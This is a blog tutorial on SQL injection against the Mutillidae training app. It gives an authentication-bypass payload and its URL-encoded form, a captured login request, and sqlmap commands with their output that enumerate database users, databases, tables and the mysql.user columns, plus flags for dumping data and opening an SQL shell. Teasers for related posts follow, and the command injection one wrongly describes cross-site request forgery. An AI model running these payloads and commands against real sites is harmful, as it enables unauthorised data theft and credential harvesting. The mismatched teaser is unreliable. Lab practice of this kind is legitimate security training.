SQL Injection Full tutorial with Example to dump Data.

-

 

SQL Injection (SQLi)

Overview

SQL injection may occcur when user or attacker controlled input is later incorporated into an SQL query which is built and executed by the web application. Web applications which do not implement code-data segmentation by using routines (i.e. - stored procedures, user-defined functions) may be vulnerable. Some sites attempt to parameterize queries which prevents SQL injection but fails to meet other objectives such as least-privilege.



 Discovery Methodology

Inject all available parameters of the web page with charaters reserved in SQL, PL/SQL, T-SQL, and MySQL. Examine responses for difference from responses with normal input. Additionally attempt to inject valid SQL statements including statements which cause errors, induce pauses, and cause differences when similar statements evaluate to true or false.

 

Hint: Use Burp-Suite and SQLMap to fuzz sites quickly

Exploitation

Determine the prefix and suffix needed to make the injected code "fit" syntatically then add a payload between. Inject the exploit.

Example: Some pages on the site are vulnerable to

 

' or 1=1 -- (Note: There is a space on the end of this expression)

Note that some characters which are reserved in databases are also reserved in web servers. If submitting injections directly via an interception proxy like Burp-Suite, URL encode the injection to avoid a syntax error on the web server.

 

URL Encoded version

%27%20%6f%72%20%31%3d%31%20%2d%2d%20

 

Running SQLMAP Help


./sqlmap.py --help 

./sqlmap.py -hh 

 Running SQLMAP "Manually"

./sqlmap.py --url="http://192.168.56.102/mutillidae/index.php?page=login.php" --data="username=asdf&password=asdf&login-php-submit-button=Login" --banner

 

Capturing Request To Pass To SQLMAP

 

Note: Save request to a file such as ~/engagements/sqlmap/login.php.request. The -r switch takes the file path.

 

URL: http://192.168.56.102/mutillidae/index.php?page=login.php

 

Request:

 

POST /mutillidae/index.php?page=login.php HTTP/1.1

Host: 192.168.56.102

User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:17.0) Gecko/20100101 Firefox/17.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Proxy-Connection: keep-alive

Referer: http://192.168.56.102/mutillidae/index.php?page=login.php

Cookie: showhints=0; PHPSESSID=fik978dbhcujcgdjfc2lg249r4

Content-Type: application/x-www-form-urlencoded

Content-Length: 57

 

username=asdf&password=asdf&login-php-submit-button=Login

 

Running SQLMAP with "auto-parse"

 

./sqlmap.py -r ~/engagements/sqlmap/login.php.request <options>

 

Running SQLMAP with various features

 

./sqlmap.py -r ~/engagements/sqlmap/login.php.request <options>

 

--banner

 

                web server operating system: Windows

                web application technology: PHP 5.4.4, Apache 2.4.2

                back-end DBMS: MySQL 5.0

                banner:    '5.5.25a'

 

--fingerprint

 

                web server operating system: Windows

                web application technology: PHP 5.4.4, Apache 2.4.2

                back-end DBMS: active fingerprint: MySQL >= 5.5.0

 

    --current-user      Retrieve DBMS current user

    --current-db        Retrieve DBMS current database

    --hostname          Retrieve DBMS server hostname

    --is-dba            Detect if the DBMS current user is DBA

 

                current user:    'root@localhost'

                current database:    'nowasp'

                current user is DBA:    True

                hostname:    'mutillid-7se1xr'

 

    --users             Enumerate DBMS users

    --passwords         Enumerate DBMS users password hashes

 

                database management system users

                [*] ''@'localhost'

                [*] 'pma'@'localhost'

                [*] 'root'@'linux'

                [*] 'root'@'localhost'

 

    --dbs               Enumerate DBMS databases

 

                available databases[10]:

                [*] cdcol

                [*] information_schema

                [*] mysql

                [*] nowasp

                [*] owasp10

                [*] owasp13

                [*] performance_schema

                [*] phpmyadmin

                [*] test

                [*] webauth

 

 

Enumerate DBMS database tables, columns, structure (schema)

 

    --tables            Enumerate DBMS database tables

    --columns           Enumerate DBMS database table columns

    --schema            Enumerate DBMS schema

    --count             Retrieve number of entries for table(s)

    --exclude-sysdbs    Exclude DBMS system databases when enumerating tables

    -D DB               DBMS database to enumerate

    -T TBL              DBMS database table to enumerate

    -C COL              DBMS database table column to enumerate

    -U USER             DBMS user to enumerate

 

Extracting data 

    --dump              Dump DBMS database table entries

    --dump-all          Dump all DBMS databases tables entries

    -D DB               DBMS database to enumerate

    -T TBL              DBMS database table to enumerate

    -C COL              DBMS database table column to enumerate

    -U USER             DBMS user to enumerate

    --exclude-sysdbs    Exclude DBMS system databases when enumerating tables

    --start=LIMITSTART  First query output entry to retrieve

    --stop=LIMITSTOP    Last query output entry to retrieve

    --sql-query=QUERY   SQL statement to be executed

    --sql-shell         Prompt for an interactive SQL shell

 

Listing columns from tables

 

   ./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql -T user --columns

                ./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql -T user --common-columns

                ./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql

                --sql-query="select column_name from information_schema.columns where table_name = 'user'"

 

                select column_name from information_schema.columns where table_name = 'user' [42]:

                                [*] Alter_priv

                                [*] Alter_routine_priv

                                [*] authentication_string

                                [*] Create_priv

                                [*] Create_routine_priv

                                [*] Create_tablespace_priv

                                [*] Create_tmp_table_priv

                                [*] Create_user_priv

                                [*] Create_view_priv

                                [*] Delete_priv

                                [*] Drop_priv

                                [*] Event_priv

                                [*] Execute_priv

                                [*] File_priv

                                [*] Grant_priv

                                [*] Host

                                [*] Index_priv

                                [*] Insert_priv

                                [*] Lock_tables_priv

                                [*] max_connections

                                [*] max_questions

                                [*] max_updates

                                [*] max_user_connections

                                [*] Password

                                [*] plugin

                                [*] Process_priv

                                [*] References_priv

                                [*] Reload_priv

                                [*] Repl_client_priv

                                [*] Repl_slave_priv

                                [*] Select_priv

                                [*] Show_db_priv

                                [*] Show_view_priv

                                [*] Shutdown_priv

                                [*] ssl_cipher

                                [*] ssl_type

                                [*] Super_priv

                                [*] Trigger_priv

                                [*] Update_priv

                                [*] User

                                [*] x509_issuer

                                [*] x509_subject

 

 

Disclaimer

This tutorial is only for Educational purpose. Don't harm anyone.

Comments

Post a Comment

Popular posts from this blog

JavaScript Object Notation (JSON) Injection

-
Image
Overview JSON injection may occcur when user or attacker controlled input is later incorporated without being encoded into the web server response. In other words, the attacker can send input which later is incorporated into the JSON response. Discovery Methodology JSON injection starts like any injection; find the possible input parameters including adding custom parameters (parameter addition attack) to see if the application will process them and place those inputs into the JSON returned by the server. (If we cannot get our input into the JSON returned by the server, we cannot inject the JSON.) Finding input parameters can be done using an ordinary Firefox browser. No special tools are required. This particular page has a drop down which is an input. Developers sometimes think that they control the web page. This of course is incorrect. The web page is running in the users browser. The user can do anything they want like change the page using Firebug. If you dont like that drop-down
Read more

Command Injection (CMDi) Overview, Discovery ,Example ,Exploitation

-
Image
  Overview Command Injection may occcur when an attacker is able to run script into a users browser. To forge a legitimate request, the script creates and send the same parameters to the target website that would be sent if the user had submitted the legitimate form themselves. The target website knows the request has come from the users browser but cannot detect that the request was created and sent by a malicious script running in the users browser. As far as the target site can tell, the user submitted the request by using the web site in the expected way. Discovery Methodology Fuzz with command separators like ;, & and && depending on if you are using Linux or Windows respectively. Look for errors that are related to operating system errors, delays in responses which can be repeated by repeating the injection, or unexpected output in the response. The error may appear as an HTML comment. Attempt to determine the operating system type. Reserved characters used in fuzzing
Read more

Cascading Style Sheet (CSS) Injection

-
Image
  Overview Cascading style injection may occcur when user or attacker controlled input is later incorporated without being encoded into the web server response with a style attribute. In other words, the attacker can send input which later is incorporated into the web page the user receives. Discovery Methodology Inject all available parameters of the web page with a searchable string such as the word "CANARY" along with characters generally useful in writing HTML, JavaScript or other code. Search the response carefully noting any location where the test string appears unencoded in a style attribute. These locations may allow Cascading style injection. Hint: An example injection might be <CANARY={}""()'';#$--/>1. Adding a sequencial integer to the test input can help determine which of the inputs parameters resulted in the response string found. Exploitation Determine the prefix and suffix needed to make the injected code "fit" syntatically t
Read more